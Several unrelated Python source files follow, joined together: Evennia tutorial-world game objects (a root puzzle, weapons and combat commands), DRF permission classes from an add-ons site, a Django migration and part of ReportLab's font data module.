self.location.msg_contents("A %s on the floor flickers and dies." % self.key)
self.location.location.check_light_state()
except AttributeError:
pass
self.delete()
def light(self):
"""
Light this object - this is called by Light command.
"""
if self.db.is_giving_light:
return False
# burn for 3 minutes before calling _burnout
self.db.is_giving_light = True
# if we are in a dark room, trigger its light check
try:
self.location.location.check_light_state()
except AttributeError:
try:
# maybe we are directly in the room
self.location.check_light_state()
except AttributeError:
pass
finally:
# start the burn timer. When it runs out, self._burnout
# will be called.
utils.delay(60 * 3, self._burnout)
return True
class CmdShiftRoot(Command):
"""
Shifts roots around.
Usage:
shift blue root left/right
shift red root left/right
shift yellow root up/down
shift green root up/down
"""
key = "shift"
aliases = ["shiftroot", "push", "pull", "move"]
# we only allow to use this command while the
# room is properly lit, so we lock it to the
# setting of Attribute "is_lit" on our location.
locks = "cmd:locattr(is_lit)"
help_category = "TutorialWorld"
def parse(self):
"""
Custom parser; split input by spaces for simplicity.
"""
self.arglist = self.args.strip().split()
def func(self):
"""
Implement the command.
blue/red - vertical roots
yellow/green - horizontal roots
"""
if not self.arglist:
self.caller.msg("What do you want to move, and in what direction?")
return
if "root" in self.arglist:
# we clean out the use of the word "root"
self.arglist.remove("root")
# we accept arguments on the form <color> <direction>
if not len(self.arglist) > 1:
self.caller.msg("You must define which colour of root you want to move, and in which direction.")
return
color = self.arglist[0].lower()
direction = self.arglist[1].lower()
# get current root positions dict
root_pos = self.obj.db.root_pos
if not color in root_pos:
self.caller.msg("No such root to move.")
return
# first, vertical roots (red/blue) - can be moved left/right
if color == "red":
if direction == "left":
root_pos[color] = max(-1, root_pos[color] - 1)
self.caller.msg("You shift the reddish root to the left.")
if root_pos[color] != 0 and root_pos[color] == root_pos["blue"]:
root_pos["blue"] += 1
self.caller.msg("The root with blue flowers gets in the way and is pushed to the right.")
elif direction == "right":
root_pos[color] = min(1, root_pos[color] + 1)
self.caller.msg("You shove the reddish root to the right.")
if root_pos[color] != 0 and root_pos[color] == root_pos["blue"]:
root_pos["blue"] -= 1
self.caller.msg("The root with blue flowers gets in the way and is pushed to the left.")
else:
self.caller.msg("You cannot move the root in that direction.")
elif color == "blue":
if direction == "left":
root_pos[color] = max(-1, root_pos[color] - 1)
self.caller.msg("You shift the root with small blue flowers to the left.")
if root_pos[color] != 0 and root_pos[color] == root_pos["red"]:
root_pos["red"] += 1
self.caller.msg("The reddish root is to big to fit as well, so that one falls away to the left.")
elif direction == "right":
root_pos[color] = min(1, root_pos[color] + 1)
self.caller.msg("You shove the root adorned with small blue flowers to the right.")
if root_pos[color] != 0 and root_pos[color] == root_pos["red"]:
root_pos["red"] -= 1
self.caller.msg("The thick reddish root gets in the way and is pushed back to the left.")
else:
self.caller.msg("You cannot move the root in that direction.")
# now the horizontal roots (yellow/green). They can be moved up/down
elif color == "yellow":
if direction == "up":
root_pos[color] = max(-1, root_pos[color] - 1)
self.caller.msg("You shift the root with small yellow flowers upwards.")
if root_pos[color] != 0 and root_pos[color] == root_pos["green"]:
root_pos["green"] += 1
self.caller.msg("The green weedy root falls down.")
elif direction == "down":
root_pos[color] = min(1, root_pos[color] + 1)
self.caller.msg("You shove the root adorned with small yellow flowers downwards.")
if root_pos[color] != 0 and root_pos[color] == root_pos["green"]:
root_pos["green"] -= 1
self.caller.msg("The weedy green root is shifted upwards to make room.")
else:
self.caller.msg("You cannot move the root in that direction.")
elif color == "green":
if direction == "up":
root_pos[color] = max(-1, root_pos[color] - 1)
self.caller.msg("You shift the weedy green root upwards.")
if root_pos[color] != 0 and root_pos[color] == root_pos["yellow"]:
root_pos["yellow"] += 1
self.caller.msg("The root with yellow flowers falls down.")
elif direction == "down":
root_pos[color] = min(1, root_pos[color] + 1)
self.caller.msg("You shove the weedy green root downwards.")
if root_pos[color] != 0 and root_pos[color] == root_pos["yellow"]:
root_pos["yellow"] -= 1
self.caller.msg("The root with yellow flowers gets in the way and is pushed upwards.")
else:
self.caller.msg("You cannot move the root in that direction.")
# we have moved the root. Store new position
self.obj.db.root_pos = root_pos
# Check victory condition
if listvalues(root_pos).count(0) == 0: # no roots in middle position
# This will affect the cmd: lock of CmdPressButton
self.obj.db.button_exposed = True
self.caller.msg("Holding aside the root you think you notice something behind it ...")
class CmdPressButton(Command):
"""
Presses a button.
"""
key = "press"
aliases = ["press button", "button", "push button"]
# only accessible if the button was found and there is light. This checks
# the Attribute button_exposed on the Wall object so that
# you can only push the button when the puzzle is solved. It also
# checks the is_lit Attribute on the location.
locks = "cmd:objattr(button_exposed) and objlocattr(is_lit)"
help_category = "TutorialWorld"
def func(self):
"Implements the command"
if self.caller.db.crumbling_wall_found_exit:
# we already pushed the button
self.caller.msg("The button folded away when the secret passage opened. You cannot push it again.")
return
# pushing the button
string = "You move your fingers over the suspicious depression, then gives it a " \
"decisive push. First nothing happens, then there is a rumble and a hidden " \
"{wpassage{n opens, dust and pebbles rumbling as part of the wall moves aside."
self.caller.msg(string)
string = "%s moves their fingers over the suspicious depression, then gives it a " \
"decisive push. First nothing happens, then there is a rumble and a hidden " \
"{wpassage{n opens, dust and pebbles rumbling as part of the wall moves aside."
self.caller.location.msg_contents(string % self.caller.key, exclude=self.caller)
self.obj.open_wall()
class CmdSetCrumblingWall(CmdSet):
"Group the commands for crumblingWall"
key = "crumblingwall_cmdset"
priority = 2
def at_cmdset_creation(self):
"called when object is first created."
self.add(CmdShiftRoot())
self.add(CmdPressButton())
class CrumblingWall(TutorialObject, DefaultExit):
"""
This is a custom Exit.
The CrumblingWall can be examined in various ways, but only if a
lit light source is in the room. The traversal itself is blocked
by a traverse: lock on the exit that only allows passage if a
certain attribute is set on the trying player.
Important attribute
destination - this property must be set to make this a valid exit
whenever the button is pushed (this hides it as an exit
until it actually is)
"""
def at_init(self):
"""
Called when object is recalled from cache.
"""
self.reset()
def at_object_creation(self):
"called when the object is first created."
super(CrumblingWall, self).at_object_creation()
self.aliases.add(["secret passage", "passage",
"crack", "opening", "secret door"])
# starting root positions. H1/H2 are the horizontally hanging roots,
# V1/V2 the vertically hanging ones. Each can have three positions:
# (-1, 0, 1) where 0 means the middle position. yellow/green are
# horizontal roots and red/blue vertical, all may have value 0, but n
# ever any other identical value.
self.db.root_pos = {"yellow": 0, "green": 0, "red": 0, "blue": 0}
# flags controlling the puzzle victory conditions
self.db.button_exposed = False
self.db.exit_open = False
# this is not even an Exit until it has a proper destination, and we won't assign
# that until it is actually open. Until then we store the destination here. This
# should be given a reasonable value at creation!
self.db.destination = 2
# we lock this Exit so that one can only execute commands on it
# if its location is lit and only traverse it once the Attribute
# exit_open is set to True.
self.locks.add("cmd:locattr(is_lit);traverse:objattr(exit_open)")
# set cmdset
self.cmdset.add(CmdSetCrumblingWall, permanent=True)
def open_wall(self):
"""
This method is called by the push button command once the puzzle
is solved. It opens the wall and sets a timer for it to reset
itself.
"""
# this will make it into a proper exit (this returns a list)
eloc = search.search_object(self.db.destination)
if not eloc:
self.caller.msg("The exit leads nowhere, there's just more stone behind it ...")
else:
self.destination = eloc[0]
self.exit_open = True
# start a 45 second timer before closing again
utils.delay(45, self.reset)
def _translate_position(self, root, ipos):
"Translates the position into words"
rootnames = {"red": "The {rreddish{n vertical-hanging root ",
"blue": "The thick vertical root with {bblue{n flowers ",
"yellow": "The thin horizontal-hanging root with {yyellow{n flowers ",
"green": "The weedy {ggreen{n horizontal root "}
vpos = {-1: "hangs far to the {wleft{n on the wall.",
0: "hangs straight down the {wmiddle{n of the wall.",
1: "hangs far to the {wright{n of the wall."}
hpos = {-1: "covers the {wupper{n part of the wall.",
0: "passes right over the {wmiddle{n of the wall.",
1: "nearly touches the floor, near the {wbottom{n of the wall."}
if root in ("yellow", "green"):
string = rootnames[root] + hpos[ipos]
else:
string = rootnames[root] + vpos[ipos]
return string
def return_appearance(self, caller):
"""
This is called when someone looks at the wall. We need to echo the
current root positions.
"""
if self.db.button_exposed:
# we found the button by moving the roots
string = "Having moved all the roots aside, you find that the center of the wall, " \
"previously hidden by the vegetation, hid a curious square depression. It was maybe once " \
"concealed and made to look a part of the wall, but with the crumbling of stone around it," \
"it's now easily identifiable as some sort of button."
elif self.db.exit_open:
# we pressed the button; the exit is open
string = "With the button pressed, a crack has opened in the root-covered wall, just wide enough " \
"to squeeze through. A cold draft is coming from the hole and you get the feeling the " \
"opening may close again soon."
else:
# puzzle not solved yet.
string = "The wall is old and covered with roots that here and there have permeated the stone. " \
"The roots (or whatever they are - some of them are covered in small non-descript flowers) " \
"crisscross the wall, making it hard to clearly see its stony surface. Maybe you could " \
"try to {wshift{n or {wmove{n them.\n"
# display the root positions to help with the puzzle
for key, pos in self.db.root_pos.items():
string += "\n" + self._translate_position(key, pos)
self.db.desc = string
# call the parent to continue execution (will use the desc we just set)
return super(CrumblingWall, self).return_appearance(caller)
def at_after_traverse(self, traverser, source_location):
"""
This is called after we traversed this exit. Cleans up and resets
the puzzle.
"""
del traverser.db.crumbling_wall_found_buttothe
del traverser.db.crumbling_wall_found_exit
self.reset()
def at_failed_traverse(self, traverser):
"This is called if the player fails to pass the Exit."
traverser.msg("No matter how you try, you cannot force yourself through %s." % self.key)
def reset(self):
"""
Called by tutorial world runner, or whenever someone successfully
traversed the Exit.
"""
self.location.msg_contents("The secret door closes abruptly, roots falling back into place.")
# reset the flags and remove the exit destination
self.db.button_exposed = False
self.db.exit_open = False
self.destination = None
# Reset the roots with some random starting positions for the roots:
start_pos = [{"yellow":1, "green":0, "red":0, "blue":0},
{"yellow":0, "green":0, "red":0, "blue":0},
{"yellow":0, "green":1, "red":-1, "blue":0},
{"yellow":1, "green":0, "red":0, "blue":0},
{"yellow":0, "green":0, "red":0, "blue":1}]
self.db.root_pos = random.choice(start_pos)
class CmdAttack(Command):
"""
Attack the enemy. Commands:
stab <enemy>
slash <enemy>
parry
stab - (thrust) makes a lot of damage but is harder to hit with.
slash - is easier to land, but does not make as much damage.
parry - forgoes your attack but will make you harder to hit on next
enemy attack.
"""
# this is an example of implementing many commands as a single
# command class, using the given command alias to separate between them.
key = "attack"
aliases = ["hit","kill", "fight", "thrust", "pierce", "stab",
"slash", "chop", "parry", "defend"]
locks = "cmd:all()"
help_category = "TutorialWorld"
def func(self):
"Implements the stab"
cmdstring = self.cmdstring
if cmdstring in ("attack", "fight"):
string = "How do you want to fight? Choose one of 'stab', 'slash' or 'defend'."
self.caller.msg(string)
return
# parry mode
if cmdstring in ("parry", "defend"):
string = "You raise your weapon in a defensive pose, ready to block the next enemy attack."
self.caller.msg(string)
self.caller.db.combat_parry_mode = True
self.caller.location.msg_contents("%s takes a defensive stance" % self.caller, exclude=[self.caller])
return
if not self.args:
self.caller.msg("Who do you attack?")
return
target = self.caller.search(self.args.strip())
if not target:
return
string = ""
tstring = ""
ostring = ""
if cmdstring in ("thrust", "pierce", "stab"):
hit = float(self.obj.db.hit) * 0.7 # modified due to stab
damage = self.obj.db.damage * 2 # modified due to stab
string = "You stab with %s. " % self.obj.key
tstring = "%s stabs at you with %s. " % (self.caller.key, self.obj.key)
ostring = "%s stabs at %s with %s. " % (self.caller.key, target.key, self.obj.key)
self.caller.db.combat_parry_mode = False
elif cmdstring in ("slash", "chop"):
hit = float(self.obj.db.hit) # un modified due to slash
damage = self.obj.db.damage # un modified due to slash
string = "You slash with %s. " % self.obj.key
tstring = "%s slash at you with %s. " % (self.caller.key, self.obj.key)
ostring = "%s slash at %s with %s. " % (self.caller.key, target.key, self.obj.key)
self.caller.db.combat_parry_mode = False
else:
self.caller.msg("You fumble with your weapon, unsure of whether to stab, slash or parry ...")
self.caller.location.msg_contents("%s fumbles with their weapon." % self.caller, exclude=self.caller)
self.caller.db.combat_parry_mode = False
return
if target.db.combat_parry_mode:
# target is defensive; even harder to hit!
target.msg("{GYou defend, trying to avoid the attack.{n")
hit *= 0.5
if random.random() <= hit:
self.caller.msg(string + "{gIt's a hit!{n")
target.msg(tstring + "{rIt's a hit!{n")
self.caller.location.msg_contents(ostring + "It's a hit!", exclude=[target,self.caller])
# call enemy hook
if hasattr(target, "at_hit"):
# should return True if target is defeated, False otherwise.
return target.at_hit(self.obj, self.caller, damage)
elif target.db.health:
target.db.health -= damage
else:
# sorry, impossible to fight this enemy ...
self.caller.msg("The enemy seems unaffacted.")
return False
else:
self.caller.msg(string + "{rYou miss.{n")
target.msg(tstring + "{gThey miss you.{n")
self.caller.location.msg_contents(ostring + "They miss.", exclude=[target, self.caller])
class CmdSetWeapon(CmdSet):
"Holds the attack command."
def at_cmdset_creation(self):
"called at first object creation."
self.add(CmdAttack())
class Weapon(TutorialObject):
"""
This defines a bladed weapon.
Important attributes (set at creation):
hit - chance to hit (0-1)
parry - chance to parry (0-1)
damage - base damage given (modified by hit success and
type of attack) (0-10)
"""
def at_object_creation(self):
"Called at first creation of the object"
super(Weapon, self).at_object_creation()
self.db.hit = 0.4 # hit chance
self.db.parry = 0.8 # parry chance
self.db.damage = 1.0
self.db.magic = False
self.cmdset.add_default(CmdSetWeapon, permanent=True)
def reset(self):
"""
When reset, the weapon is simply deleted, unless it has a place
to return to.
"""
if self.location.has_player and self.home == self.location:
self.location.msg_contents("%s suddenly and magically fades into nothingness, as if it was never there ..." % self.key)
self.delete()
else:
self.location = self.home
WEAPON_PROTOTYPES = {
"weapon": {
"typeclass": "evennia.contrib.tutorial_world.objects.Weapon",
"key": "Weapon",
"hit": 0.2,
"parry": 0.2,
"damage": 1.0,
"magic": False,
"desc": "A generic blade."},
"knife": {
"prototype": "weapon",
"aliases": "sword",
"key": "Kitchen knife",
"desc":"A rusty kitchen knife. Better than nothing.",
"damage": 3},
"dagger": {
"prototype": "knife",
"key": "Rusty dagger",
"aliases": ["knife", "dagger"],
"desc": "A double-edged dagger with a nicked edge and a wooden handle.",
"hit": 0.25},
"sword": {
"prototype": "weapon",
"key": "Rusty sword",
"aliases": ["sword"],
"desc": "A rusty shortsword. It has a leather-wrapped handle covered i food grease.",
"hit": 0.3,
"damage": 5,
"parry": 0.5},
"club": {
"prototype": "weapon",
"key":"Club",
"desc": "A heavy wooden club, little more than a heavy branch.",
"hit": 0.4,
"damage": 6,
"parry": 0.2},
"axe": {
"prototype": "weapon",
"key":"Axe",
"desc": "A woodcutter's axe with a keen edge.",
"hit": 0.4,
"damage": 6,
"parry": 0.2},
"ornate longsword": {
"prototype":"sword",
"key": "Ornate longsword",
"desc": "A fine longsword with some swirling patterns on the handle.",
"hit": 0.5,
"magic": True,
"damage": 5},
"warhammer": {
"prototype": "club",
"key": "Silver Warhammer",
"aliases": ["hammer", "warhammer", "war"],
"desc": "A heavy war hammer with silver ornaments. This huge weapon causes massive damage - if you can hit.",
"hit": 0.4,
"magic": True,
"damage": 8},
"rune axe": {
"prototype": "axe",
"key": "Runeaxe",
"aliases": ["axe"],
"hit": 0.4,
"magic": True,
"damage": 6},
"thruning": {
"prototype": "ornate longsword",
"key": "Broadsword named Thruning",
"desc": "This heavy bladed weapon is marked with the name 'Thruning'. It is very powerful in skilled hands.",
"hit": 0.6,
"parry": 0.6,
"damage": 7},
"slayer waraxe": {
"prototype": "rune axe",
"key": "Slayer waraxe",
"aliases": ["waraxe", "war", "slayer"],
"desc": "A huge double-bladed axe marked with the runes for 'Slayer'. It has more runic inscriptions on its head, which you cannot decipher.",
"hit": 0.7,
"damage": 8},
"ghostblade": {
"prototype": "ornate longsword",
"key": "The Ghostblade",
"aliases": ["blade", "ghost"],
"desc": "This massive sword is large as you are tall, yet seems to weigh almost nothing. It's almost like it's not really there.",
"hit": 0.9,
"parry": 0.8,
"damage": 10},
"hawkblade": {
"prototype": "ghostblade",
"key": "The Hawblade",
"aliases": ["hawk", "blade"],
"desc": "The weapon of a long-dead heroine and a more civilized age, the hawk-shaped hilt of this blade almost has a life of its own.",
"hit": 0.85,
"parry": 0.7,
"damage": 11}
}
class CmdGetWeapon(Command):
"""
Usage:
get weapon
This will try to obtain a weapon from the container.
"""
key = "get weapon"
aliases = "get weapon"
locks = "cmd:all()"
help_cateogory = "TutorialWorld"
def func(self):
"""
Get a weapon from the container. It will
itself handle all messages.
"""
self.obj.produce_weapon(self.caller)
class CmdSetWeaponRack(CmdSet):
"""
The cmdset for the rack.
"""
key = "weaponrack_cmdset"
def at_cmdset_creation(self):
"Called at first creation of cmdset"
self.add(CmdGetWeapon())
class WeaponRack(TutorialObject):
"""
This object represents a weapon store. When people use the
"get weapon" command on this rack, it will produce one
random weapon from among those registered to exist
on it. This will also set a property on the character
to make sure they can't get more than one at a time.
Attributes to set on this object:
available_weapons: list of prototype-keys from
WEAPON_PROTOTYPES, the weapons available in this rack.
no_more_weapons_msg - error message to return to players
who already got one weapon from the rack and tries to
grab another one.
"""
def at_object_creation(self):
"""
called at creation
"""
self.cmdset.add_default(CmdSetWeaponRack, permanent=True)
self.db.rack_id = "weaponrack_1"
# these are prototype names from the prototype
# dictionary above.
self.db.get_weapon_msg = "You find {c%s{n."
self.db.no_more_weapons_msg = "you find nothing else of use."
self.db.available_weapons = ["knife", "dagger",
"sword", "club"]
def produce_weapon(self, caller):
"""
This will produce a new weapon from the rack,
assuming the caller hasn't already gotten one. When
doing so, the caller will get Tagged with the id
of this rack, to make sure they cannot keep
pulling weapons from it indefinitely.
"""
rack_id = self.db.rack_id
if caller.tags.get(rack_id, category="tutorial_world"):
caller.msg(self.db.no_more_weapons_msg)
else:
prototype = random.choice(self.db.available_weapons)
# use the spawner to create a new Weapon from the
# spawner dictionary, tag the caller
wpn = spawn(WEAPON_PROTOTYPES[prototype], prototype_parents=WEAPON_PROTOTYPES)[0]
caller.tags.add(rack_id, category="tutorial_world")
wpn.location = caller
caller.msg(self.db.get_weapon_msg % wpn.key)
|
class ResourceOptions(object):
"""
A configuration class for ``Resource``.
Provides sane defaults and the logic needed to augment these settings with
the internal ``class Meta`` used on ``Resource`` subclasses.
"""
allowed_methods = ['get', 'post', 'put', 'delete', 'patch']
list_allowed_methods = None
detail_allowed_methods = None
urlconf_namespace = None
default_format = 'application/json'
filtering = {}
ordering = []
object_class = None
queryset = None
fields = []
excludes = []
include_resource_uri = True
include_absolute_url = False
always_return_data = False
api_name = None
resource_name = None
resp_message = 'Good!'
resp_script = None
resp_success = True
resp_template = 'adminpanel/ap-test.html'
resp_type = 'tpl'
resp_render_data = None
make_function = None
def __new__(cls, meta=None):
overrides = {}
# Handle overrides.
if meta:
for override_name in dir(meta):
# No internals please.
if not override_name.startswith('_'):
overrides[override_name] = getattr(meta, override_name)
allowed_methods = overrides.get('allowed_methods', ['get', 'post', 'put', 'delete', 'patch'])
if overrides.get('list_allowed_methods', None) is None:
overrides['list_allowed_methods'] = allowed_methods
if overrides.get('detail_allowed_methods', None) is None:
overrides['detail_allowed_methods'] = allowed_methods
return object.__new__(type('ResourceOptions', (cls,), overrides))
|
from rest_framework.exceptions import MethodNotAllowed
from rest_framework.permissions import SAFE_METHODS, BasePermission
from olympia.amo import permissions
from olympia.access import acl
class GroupPermission(BasePermission):
"""
Allow access depending on the result of action_allowed_user().
"""
def __init__(self, permission):
self.permission = permission
def has_permission(self, request, view):
if not request.user.is_authenticated:
return False
return acl.action_allowed_user(request.user, self.permission)
def has_object_permission(self, request, view, obj):
return self.has_permission(request, view)
def __call__(self, *a):
"""
ignore DRF's nonsensical need to call this object.
"""
return self
class AnyOf(BasePermission):
"""
Takes multiple permission objects and succeeds if any single one does.
"""
def __init__(self, *perms):
# DRF calls the items in permission_classes, might as well do
# it here too.
self.perms = [p() for p in perms]
def has_permission(self, request, view):
return any(perm.has_permission(request, view) for perm in self.perms)
def has_object_permission(self, request, view, obj):
# This method *must* call `has_permission` for each
# sub-permission since the default implementation of
# `has_object_permission` returns True unconditionally, and
# some permission objects might not override it.
return any((perm.has_permission(request, view) and
perm.has_object_permission(request, view, obj))
for perm in self.perms)
def __call__(self):
return self
class AllOf(BasePermission):
"""
Takes multiple permission objects and succeeds if all of them do.
"""
def __init__(self, *perms):
# DRF calls the items in permission_classes, might as well do
# it here too.
self.perms = [p() for p in perms]
def has_permission(self, request, view):
return all(perm.has_permission(request, view) for perm in self.perms)
def has_object_permission(self, request, view, obj):
# This method *must* call `has_permission` for each
# sub-permission since the default implementation of
# `has_object_permission` returns True unconditionally, and
# some permission objects might not override it.
return all((perm.has_permission(request, view) and
perm.has_object_permission(request, view, obj))
for perm in self.perms)
def __call__(self):
return self
class AllowNone(BasePermission):
def has_permission(self, request, view):
return False
def has_object_permission(self, request, view, obj):
return False
class AllowAddonAuthor(BasePermission):
"""Allow access if the user is in the object authors."""
def has_permission(self, request, view):
return request.user.is_authenticated
def has_object_permission(self, request, view, obj):
return obj.authors.filter(pk=request.user.pk).exists()
class AllowOwner(BasePermission):
"""
Permission class to use when you are dealing with a model instance that has
a "user" FK pointing to an UserProfile, and you want only the corresponding
user to be able to access your instance.
"""
def has_permission(self, request, view):
return request.user.is_authenticated
def has_object_permission(self, request, view, obj):
return ((obj == request.user) or
(getattr(obj, 'user', None) == request.user))
class AllowNotOwner(AllowOwner):
"""
Permission class to use when you are dealing with a model instance that has
a "user" FK pointing to an UserProfile, and you want only the corresponding
user to be able to access your instance.
"""
def has_object_permission(self, request, view, obj):
return not super().has_object_permission(request, view, obj)
class AllowReviewer(BasePermission):
"""Allow reviewers to access add-ons with listed versions.
The user logged in must either be making a read-only request and have the
'ReviewerTools:View' permission, or simply be a reviewer or admin.
The definition of an add-on reviewer depends on the object:
- For static themes, it's someone with 'Addons:ThemeReview'
- For personas, it's someone with 'Personas:Review'
- For the rest of the add-ons, is someone who has either
'Addons:Review', 'Addons:PostReview' or 'Addons:ContentReview'
permission.
"""
def has_permission(self, request, view):
return request.user.is_authenticated
def has_object_permission(self, request, view, obj):
can_access_because_viewer = (
request.method in SAFE_METHODS and
acl.action_allowed(request, permissions.REVIEWER_TOOLS_VIEW))
can_access_because_listed_reviewer = (
obj.has_listed_versions() and acl.is_reviewer(request, obj))
return can_access_because_viewer or can_access_because_listed_reviewer
class AllowReviewerUnlisted(AllowReviewer):
"""Allow unlisted reviewers to access add-ons with unlisted versions, or
add-ons with no listed versions at all.
Like reviewers.decorators.unlisted_addons_reviewer_required, but as a
permission class and not a decorator.
The user logged in must an unlisted add-on reviewer or admin.
An unlisted add-on reviewer is someone who is in the group with the
following permission: 'Addons:ReviewUnlisted'.
"""
def has_permission(self, request, view):
return acl.check_unlisted_addons_reviewer(request)
def has_object_permission(self, request, view, obj):
return (
(obj.has_unlisted_versions() or not obj.has_listed_versions()) and
self.has_permission(request, view))
class AllowAnyKindOfReviewer(BasePermission):
"""Allow access to any kind of reviewer. Use only for views that don't
alter add-on data.
Allows access to users with any of those permissions:
- ReviewerTools:View
- Addons:Review
- Addons:ReviewUnlisted
- Addons:ContentReview
- Addons:PostReview
- Personas:Review
Uses acl.is_user_any_kind_of_reviewer() behind the scenes.
See also any_reviewer_required() decorator.
"""
def has_permission(self, request, view):
return acl.is_user_any_kind_of_reviewer(request.user)
def has_object_permission(self, request, view, obj):
return self.has_permission(request, view)
class AllowIfPublic(BasePermission):
"""
Allow access when the object's is_public() method returns True.
"""
def has_permission(self, request, view):
return True
def has_object_permission(self, request, view, obj):
return (obj.is_public() and self.has_permission(request, view))
class AllowReadOnlyIfPublic(AllowIfPublic):
"""
Allow access when the object's is_public() method returns True and the
request HTTP method is GET/OPTIONS/HEAD.
"""
def has_permission(self, request, view):
return request.method in SAFE_METHODS
class ByHttpMethod(BasePermission):
"""
Permission class allowing you to define different permissions depending on
the HTTP method used.
method_permission is a dict with the lowercase http method names as keys,
permission classes (not instantiated, like DRF expects them) as values.
Warning: you probably want to define AllowAny for 'options' if you are
using a CORS-enabled endpoint.
If using this permission, any method that does not have a permission set
will raise MethodNotAllowed.
"""
def __init__(self, method_permissions):
# Initialize the permissions by calling them like DRF does.
self.method_permissions = {
method: perm() for method, perm in method_permissions.items()}
def has_permission(self, request, view):
try:
perm = self.method_permissions[request.method.lower()]
except KeyError:
raise MethodNotAllowed(request.method)
return perm.has_permission(request, view)
def has_object_permission(self, request, view, obj):
try:
perm = self.method_permissions[request.method.lower()]
except KeyError:
raise MethodNotAllowed(request.method)
return perm.has_object_permission(request, view, obj)
def __call__(self):
return self
class AllowRelatedObjectPermissions(BasePermission):
"""
Permission class that tests given permissions against a related object.
The first argument, `related_property`, is the property that will be used
to find the related object to test the permissions against.
The second argument, `related_permissions`, is the list of permissions
(behaving like DRF default implementation: all need to pass to be allowed).
"""
def __init__(self, related_property, related_permissions):
self.perms = [p() for p in related_permissions]
self.related_property = related_property
def has_permission(self, request, view):
return all(perm.has_permission(request, view) for perm in self.perms)
def has_object_permission(self, request, view, obj):
related_obj = getattr(obj, self.related_property)
return all(perm.has_object_permission(request, view, related_obj)
for perm in self.perms)
def __call__(self):
return self
class PreventActionPermission(BasePermission):
"""
Allow access except for a given action(s).
"""
def __init__(self, actions):
if not isinstance(actions, (list, tuple)):
actions = [actions]
self.actions = actions
def has_permission(self, request, view):
return getattr(view, 'action', '') not in self.actions
def has_object_permission(self, request, view, obj):
return True
def __call__(self, *a):
"""
ignore DRF's nonsensical need to call this object.
"""
return self
|
from __future__ import unicode_literals
from django.db import models, migrations
def create_site(apps, schema_editor):
# We get the model from the versioned app registry;
# if we directly import it, it'll be the wrong version
Site = apps.get_model('sites', 'Site')
db_alias = schema_editor.connection.alias
Site.objects.using(db_alias).get_or_create(
pk=1,
defaults= {
"pk": 1,
"domain": "us.pycon.org",
"name": "PyCon 2017"
}
)
class Migration(migrations.Migration):
dependencies = [
('conference', '0001_initial'),
('sites', '0001_initial'),
]
operations = [
migrations.RunPython(create_site),
]
|
__version__=''' $Id: _fontdata.py 3052 2007-03-07 14:04:49Z rgbecker $ '''
__doc__="""
database of font related things
standardFonts tuple of the 14 standard string font names
standardEncodings tuple of the known standard font names
encodings a mapping object from standard encoding names (and minor variants)
to the encoding vectors ie the tuple of string glyph names
widthsByFontGlyph fontname x glyphname --> width of glyph
widthVectorsByFont fontName -> vector of widths
"""
import UserDict, os, sys
widthVectorsByFont = {}
fontsByName = {}
fontsByBaseEnc = {}
standardFonts = (
'Courier', 'Courier-Bold', 'Courier-Oblique', 'Courier-BoldOblique',
'Helvetica', 'Helvetica-Bold', 'Helvetica-Oblique', 'Helvetica-BoldOblique',
'Times-Roman', 'Times-Bold', 'Times-Italic', 'Times-BoldItalic',
'Symbol','ZapfDingbats')
standardFontAttributes = {
#family, bold, italic defined for basic ones
'Courier':('Courier',0,0),
'Courier-Bold':('Courier',1,0),
'Courier-Oblique':('Courier',0,1),
'Courier-BoldOblique':('Courier',1,1),
'Helvetica':('Helvetica',0,0),
'Helvetica-Bold':('Helvetica',1,0),
'Helvetica-Oblique':('Helvetica',0,1),
'Helvetica-BoldOblique':('Helvetica',1,1),
'Times-Roman':('Times-Roman',0,0),
'Times-Bold':('Times-Roman',1,0),
'Times-Italic':('Times-Roman',0,1),
'Times-BoldItalic':('Times-Roman',1,1),
'Symbol':('Symbol',0,0),
'ZapfDingbats':('ZapfDingbats',0,0)
}
_font2fnrMapWin32 = {
'symbol': 'Sy______',
'zapfdingbats': 'Zd______',
'helvetica': '_a______',
'helvetica-bold': '_ab_____',
'helvetica-boldoblique': '_abi____',
'helvetica-oblique': '_ai_____',
'times-bold': '_eb_____',
'times-bolditalic': '_ebi____',
'times-italic': '_ei_____',
'times-roman': '_er_____',
'courier-bold': 'cob_____',
'courier-boldoblique': 'cobo____',
'courier': 'com_____',
'courier-oblique': 'coo_____',
}
if sys.platform in ('linux2',):
_font2fnrMapLinux2 ={
'symbol': 'Symbol',
'zapfdingbats': 'ZapfDingbats',
'helvetica': 'Arial',
'helvetica-bold': 'Arial-Bold',
'helvetica-boldoblique': 'Arial-BoldItalic',
'helvetica-oblique': 'Arial-Italic',
'times-bold': 'TimesNewRoman-Bold',
'times-bolditalic':'TimesNewRoman-BoldItalic',
'times-italic': 'TimesNewRoman-Italic',
'times-roman': 'TimesNewRoman',
'courier-bold': 'Courier-Bold',
'courier-boldoblique': 'Courier-BoldOblique',
'courier': 'Courier',
'courier-oblique': 'Courier-Oblique',
}
_font2fnrMap = _font2fnrMapLinux2
for k, v in _font2fnrMap.items():
if k in _font2fnrMapWin32.keys():
_font2fnrMapWin32[v.lower()] = _font2fnrMapWin32[k]
del k, v
else:
_font2fnrMap = _font2fnrMapWin32
def _findFNR(fontName):
return _font2fnrMap[fontName.lower()]
from reportlab.rl_config import T1SearchPath
from reportlab.lib.utils import rl_isfile
def _searchT1Dirs(n,rl_isfile=rl_isfile,T1SearchPath=T1SearchPath):
assert T1SearchPath!=[], "No Type-1 font search path"
for d in T1SearchPath:
f = os.path.join(d,n)
if rl_isfile(f): return f
return None
del T1SearchPath, rl_isfile
def findT1File(fontName,ext='.pfb'):
if sys.platform in ('linux2',) and ext=='.pfb':
try:
f = _searchT1Dirs(_findFNR(fontName))
if f: return f
except:
pass
try:
f = _searchT1Dirs(_font2fnrMapWin32[fontName.lower()]+ext)
if f: return f
except:
pass
return _searchT1Dirs(_findFNR(fontName)+ext)
standardEncodings = ('WinAnsiEncoding','MacRomanEncoding','StandardEncoding','SymbolEncoding','ZapfDingbatsEncoding','PDFDocEncoding', 'MacExpertEncoding')
class _Name2StandardEncodingMap(UserDict.UserDict):
'''Trivial fake dictionary with some [] magic'''
_XMap = {'winansi':'WinAnsiEncoding','macroman': 'MacRomanEncoding','standard':'StandardEncoding','symbol':'SymbolEncoding', 'zapfdingbats':'ZapfDingbatsEncoding','pdfdoc':'PDFDocEncoding', 'macexpert':'MacExpertEncoding'}
def __setitem__(self,x,v):
y = x.lower()
if y[-8:]=='encoding': y = y[:-8]
y = self._XMap[y]
if y in self.keys(): raise IndexError, 'Encoding %s is already set' % y
self.data[y] = v
def __getitem__(self,x):
y = x.lower()
